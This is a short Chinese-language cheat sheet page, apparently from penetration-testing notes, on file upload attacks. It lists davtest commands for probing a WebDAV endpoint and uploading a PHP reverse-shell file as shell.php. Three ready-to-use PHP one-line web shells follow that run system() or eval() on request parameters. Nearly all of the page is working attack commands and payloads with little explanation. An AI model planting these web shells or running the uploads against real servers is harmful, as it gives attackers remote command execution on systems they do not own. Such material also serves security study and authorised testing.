文件上传攻击

davtest工具上传文件

# 测试是否能上传
davtest -url http://10.10.10.1/webdav 
# 需要身份认证
davtest -url http://10.10.10.1/webdav -auth 账号:密码
# 上传反弹shell文件到目标路径
# -uploadfile 选择需要上传的本地文件名称
# -uploadloc 上传到目标路径之后的文件名称
davtest -url http://10.10.10.1/webdav -uploadfile php-reverse-shell.php -uploadloc shell.php

PHP一句话木马

<?php system($_GET['cmd']);?>

<?php eval($_POST['cmd']); ?>

<?php @eval($_GET['EDISEC']); ?>
上一页SSRF攻击下一页文件包含LFI RFI

最后更新于

这有帮助吗?